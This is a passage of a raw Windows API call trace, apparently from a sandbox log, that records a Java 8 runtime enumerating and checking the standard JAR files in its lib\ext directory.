Files\\Java\\jre1.8.0_92\\lib\\ext", fInfoLevelId=0x0, lpFileInformation=0x4bece0 | out: lpFileInformation=0x4bece0) returned 1 [0017.647] ReadFile (in: hFile=0x130, lpBuffer=0x4bcba4, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bcb6c, lpOverlapped=0x0 | out: lpBuffer=0x4bcba4*, lpNumberOfBytesRead=0x4bcb6c*=0x5e7, lpOverlapped=0x0) returned 1 [0017.650] GetFileType (hFile=0x130) returned 0x1 [0017.650] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x4bebec | out: lpNewFilePointer=0x0) returned 1 [0017.650] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x4bec10 | out: lpFileSize=0x4bec10*=1511) returned 1 [0017.710] ReadFile (in: hFile=0x130, lpBuffer=0x4bcba4, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bcb6c, lpOverlapped=0x0 | out: lpBuffer=0x4bcba4*, lpNumberOfBytesRead=0x4bcb6c*=0x0, lpOverlapped=0x0) returned 1 [0017.712] CloseHandle (hObject=0x130) returned 1 [0017.712] wcslen (_String="C:\\Windows\\Sun\\Java\\lib\\ext\\meta-index") returned 0x26 [0017.712] wcscpy (in: _Dest=0xb2af78, _Source="C:\\Windows\\Sun\\Java\\lib\\ext\\meta-index" | out: _Dest="C:\\Windows\\Sun\\Java\\lib\\ext\\meta-index") returned="C:\\Windows\\Sun\\Java\\lib\\ext\\meta-index" [0017.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\Sun\\Java\\lib\\ext\\meta-index", nBufferLength=0x9, lpBuffer=0x4bed90, lpFilePart=0x4bed8c | out: lpBuffer="", lpFilePart=0x4bed8c) returned 0x27 [0017.712] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Sun\\Java\\lib\\ext\\meta-index", fInfoLevelId=0x0, lpFileInformation=0x4bed80 | out: lpFileInformation=0x4bed80) returned 0 [0017.712] GetLastError () returned 0x3 [0017.713] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.713] wcscpy (in: _Dest=0xb308c0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext" [0017.713] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.713] wcscpy (in: _Dest=0xb30f50, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext" [0017.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x10 [0017.713] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.713] wcscat (in: _Dest=0xb30f50, _Source="\\*" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\*") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\*" [0017.713] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\*", lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 0x24ee80 [0017.714] wcscmp (_String1=".", _String2=".") returned 0 [0017.714] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.714] wcscmp (_String1="..", _String2=".") returned 1 [0017.714] wcscmp (_String1="..", _String2="..") returned 0 [0017.714] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.714] wcscmp (_String1="access-bridge.jar", _String2=".") returned 1 [0017.714] wcscmp (_String1="access-bridge.jar", _String2="..") returned 1 [0017.714] wcslen (_String="access-bridge.jar") returned 0x11 [0017.714] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.714] wcscmp (_String1="cldrdata.jar", _String2=".") returned 1 [0017.714] wcscmp (_String1="cldrdata.jar", _String2="..") returned 1 [0017.714] wcslen (_String="cldrdata.jar") returned 0xc [0017.714] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.714] wcscmp (_String1="dnsns.jar", _String2=".") returned 1 [0017.714] wcscmp (_String1="dnsns.jar", _String2="..") returned 1 [0017.714] wcslen (_String="dnsns.jar") returned 0x9 [0017.714] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.714] wcscmp (_String1="jaccess.jar", _String2=".") returned 1 [0017.714] wcscmp (_String1="jaccess.jar", _String2="..") returned 1 [0017.714] wcslen (_String="jaccess.jar") returned 0xb [0017.715] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.715] wcscmp (_String1="jfxrt.jar", _String2=".") returned 1 [0017.715] wcscmp (_String1="jfxrt.jar", _String2="..") returned 1 [0017.715] wcslen (_String="jfxrt.jar") returned 0x9 [0017.715] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.715] wcscmp (_String1="localedata.jar", _String2=".") returned 1 [0017.715] wcscmp (_String1="localedata.jar", _String2="..") returned 1 [0017.715] wcslen (_String="localedata.jar") returned 0xe [0017.715] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.715] wcscmp (_String1="meta-index", _String2=".") returned 1 [0017.715] wcscmp (_String1="meta-index", _String2="..") returned 1 [0017.715] wcslen (_String="meta-index") returned 0xa [0017.715] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.715] wcscmp (_String1="nashorn.jar", _String2=".") returned 1 [0017.715] wcscmp (_String1="nashorn.jar", _String2="..") returned 1 [0017.715] wcslen (_String="nashorn.jar") returned 0xb [0017.715] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.715] wcscmp (_String1="sunec.jar", _String2=".") returned 1 [0017.715] wcscmp (_String1="sunec.jar", _String2="..") returned 1 [0017.715] wcslen (_String="sunec.jar") returned 0x9 [0017.716] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.716] wcscmp (_String1="sunjce_provider.jar", _String2=".") returned 1 [0017.716] wcscmp (_String1="sunjce_provider.jar", _String2="..") returned 1 [0017.716] wcslen (_String="sunjce_provider.jar") returned 0x13 [0017.716] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.716] wcscmp (_String1="sunmscapi.jar", _String2=".") returned 1 [0017.716] wcscmp (_String1="sunmscapi.jar", _String2="..") returned 1 [0017.716] wcslen (_String="sunmscapi.jar") returned 0xd [0017.716] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.716] wcscmp (_String1="sunpkcs11.jar", _String2=".") returned 1 [0017.716] wcscmp (_String1="sunpkcs11.jar", _String2="..") returned 1 [0017.716] wcslen (_String="sunpkcs11.jar") returned 0xd [0017.716] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 1 [0017.716] wcscmp (_String1="zipfs.jar", _String2=".") returned 1 [0017.716] wcscmp (_String1="zipfs.jar", _String2="..") returned 1 [0017.716] wcslen (_String="zipfs.jar") returned 0x9 [0017.716] FindNextFileW (in: hFindFile=0x24ee80, lpFindFileData=0x4beb44 | out: lpFindFileData=0x4beb44) returned 0 [0017.716] GetLastError () returned 0x12 [0017.716] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.718] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned 0x3b [0017.718] _wfullpath (in: _Buffer=0xb30fd0, _Path="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar" [0017.718] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned 0x3b [0017.718] wcsncmp (_String1="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0017.718] wcslen (_String="C:\\Program Files") returned 0x10 [0017.718] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x4be270 | out: lpFindFileData=0x4be270) returned 0x24ee80 [0017.719] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.719] wcslen (_String="Program Files") returned 0xd [0017.719] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0017.719] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x4be270 | out: lpFindFileData=0x4be270) returned 0x24ee80 [0017.719] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.719] wcslen (_String="Java") returned 0x4 [0017.719] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0017.719] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92", lpFindFileData=0x4be270 | out: lpFindFileData=0x4be270) returned 0x24ee80 [0017.719] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.719] wcslen (_String="jre1.8.0_92") returned 0xb [0017.719] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0017.719] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib", lpFindFileData=0x4be270 | out: lpFindFileData=0x4be270) returned 0x24ee80 [0017.719] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.720] wcslen (_String="lib") returned 0x3 [0017.720] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.720] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext", lpFindFileData=0x4be270 | out: lpFindFileData=0x4be270) returned 0x24ee80 [0017.720] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.720] wcslen (_String="ext") returned 0x3 [0017.720] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned 0x3b [0017.720] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar", lpFindFileData=0x4be270 | out: lpFindFileData=0x4be270) returned 0x24ee80 [0017.720] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.720] wcslen (_String="access-bridge.jar") returned 0x11 [0017.720] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned 0x3b [0017.721] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned 0x3b [0017.721] wcscpy (in: _Dest=0xb2aff8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar" [0017.721] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar", nBufferLength=0x9, lpBuffer=0x4beca0, lpFilePart=0x4bec9c | out: lpBuffer="", lpFilePart=0x4bec9c) returned 0x3c [0017.721] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec90 | out: lpFileInformation=0x4bec90) returned 1 [0017.721] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned 0x3b [0017.721] wcscpy (in: _Dest=0xb2aff8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar" [0017.721] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar", nBufferLength=0x9, lpBuffer=0x4beca0, lpFilePart=0x4bec9c | out: lpBuffer="", lpFilePart=0x4bec9c) returned 0x3c [0017.721] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec90 | out: lpFileInformation=0x4bec90) returned 1 [0017.747] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned 0x3b [0017.747] wcscpy (in: _Dest=0xb2aff8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar" [0017.747] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar", nBufferLength=0x9, lpBuffer=0x4bed10, lpFilePart=0x4bed0c | out: lpBuffer="", lpFilePart=0x4bed0c) returned 0x3c [0017.747] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed00 | out: lpFileInformation=0x4bed00) returned 1 [0017.753] strlen (_Str="sun/net/www/protocol/file/Handler") returned 0x21 [0017.756] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.756] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar") returned 0x36 [0017.756] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar", lpFindFileData=0x4be224 | out: lpFindFileData=0x4be224) returned 0x24ee80 [0017.756] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.756] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.756] wcslen (_String="cldrdata.jar") returned 0xc [0017.756] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar") returned 0x36 [0017.757] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar") returned 0x36 [0017.757] wcscpy (in: _Dest=0xb2aff0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar" [0017.757] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar", nBufferLength=0x9, lpBuffer=0x4bed10, lpFilePart=0x4bed0c | out: lpBuffer="", lpFilePart=0x4bed0c) returned 0x37 [0017.757] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed00 | out: lpFileInformation=0x4bed00) returned 1 [0017.758] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.758] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar") returned 0x33 [0017.758] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar", lpFindFileData=0x4be224 | out: lpFindFileData=0x4be224) returned 0x24ee80 [0017.759] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.759] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.759] wcslen (_String="dnsns.jar") returned 0x9 [0017.759] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar") returned 0x33 [0017.759] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar") returned 0x33 [0017.760] wcscpy (in: _Dest=0xb2afe8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar" [0017.760] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar", nBufferLength=0x9, lpBuffer=0x4bed10, lpFilePart=0x4bed0c | out: lpBuffer="", lpFilePart=0x4bed0c) returned 0x34 [0017.760] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed00 | out: lpFileInformation=0x4bed00) returned 1 [0017.760] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.761] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar") returned 0x35 [0017.761] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar", lpFindFileData=0x4be224 | out: lpFindFileData=0x4be224) returned 0x24ee80 [0017.761] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.761] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.761] wcslen (_String="jaccess.jar") returned 0xb [0017.761] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar") returned 0x35 [0017.762] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar") returned 0x35 [0017.762] wcscpy (in: _Dest=0xb2aff0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar" [0017.762] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar", nBufferLength=0x9, lpBuffer=0x4bed10, lpFilePart=0x4bed0c | out: lpBuffer="", lpFilePart=0x4bed0c) returned 0x36 [0017.762] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed00 | out: lpFileInformation=0x4bed00) returned 1 [0017.763] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.763] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar") returned 0x33 [0017.763] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar", lpFindFileData=0x4be224 | out: lpFindFileData=0x4be224) returned 0x24ee80 [0017.763] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.763] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.763] wcslen (_String="jfxrt.jar") returned 0x9 [0017.763] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar") returned 0x33 [0017.764] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar") returned 0x33 [0017.764] wcscpy (in: _Dest=0xb2afe8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar" [0017.764] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar", nBufferLength=0x9, lpBuffer=0x4bed10, lpFilePart=0x4bed0c | out: lpBuffer="", lpFilePart=0x4bed0c) returned 0x34 [0017.764] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed00 | out: lpFileInformation=0x4bed00) returned 1 [0017.765] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.765] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar") returned 0x38 [0017.765] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar", lpFindFileData=0x4be224 | out: lpFindFileData=0x4be224) returned 0x24ee80 [0017.765] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.766] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.766] wcslen (_String="localedata.jar") returned 0xe [0017.766] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar") returned 0x38 [0017.767] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar") returned 0x38 [0017.767] wcscpy (in: _Dest=0xb2aff8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar" [0017.767] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar", nBufferLength=0x9, lpBuffer=0x4bed10, lpFilePart=0x4bed0c | out: lpBuffer="", lpFilePart=0x4bed0c) returned 0x39 [0017.767] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed00 | out: lpFileInformation=0x4bed00) returned 1 [0017.768] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.768] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar") returned 0x35 [0017.768] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar", lpFindFileData=0x4be224 | out: lpFindFileData=0x4be224) returned 0x24ee80 [0017.768] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.769] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.769] wcslen (_String="nashorn.jar") returned 0xb [0017.769] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar") returned 0x35 [0017.770] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar") returned 0x35 [0017.770] wcscpy (in: _Dest=0xb2aff0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar" [0017.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar", nBufferLength=0x9, lpBuffer=0x4bed10, lpFilePart=0x4bed0c | out: lpBuffer="", lpFilePart=0x4bed0c) returned 0x36 [0017.770] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed00 | out: lpFileInformation=0x4bed00) returned 1 [0017.771] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.771] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar") returned 0x33 [0017.771] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar", lpFindFileData=0x4be224 | out: lpFindFileData=0x4be224) returned 0x24ee80 [0017.771] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.771] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.771] wcslen (_String="sunec.jar") returned 0x9 [0017.771] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar") returned 0x33 [0017.772] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar") returned 0x33 [0017.772] wcscpy (in: _Dest=0xb2afe8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar" [0017.772] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar", nBufferLength=0x9, lpBuffer=0x4bed10, lpFilePart=0x4bed0c | out: lpBuffer="", lpFilePart=0x4bed0c) returned 0x34 [0017.772] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed00 | out: lpFileInformation=0x4bed00) returned 1 [0017.774] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.774] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar") returned 0x3d [0017.774] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar", lpFindFileData=0x4be224 | out: lpFindFileData=0x4be224) returned 0x24ee80 [0017.774] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.774] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.774] wcslen (_String="sunjce_provider.jar") returned 0x13 [0017.774] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar") returned 0x3d [0017.775] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar") returned 0x3d [0017.775] wcscpy (in: _Dest=0xb2b000, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar" [0017.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar", nBufferLength=0x9, lpBuffer=0x4bed10, lpFilePart=0x4bed0c | out: lpBuffer="", lpFilePart=0x4bed0c) returned 0x3e [0017.775] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed00 | out: lpFileInformation=0x4bed00) returned 1 [0017.776] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.776] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar") returned 0x37 [0017.776] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar", lpFindFileData=0x4be224 | out: lpFindFileData=0x4be224) returned 0x24ee80 [0017.776] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.776] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.776] wcslen (_String="sunmscapi.jar") returned 0xd [0017.776] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar") returned 0x37 [0017.777] wcslen (_String="C:\\Program 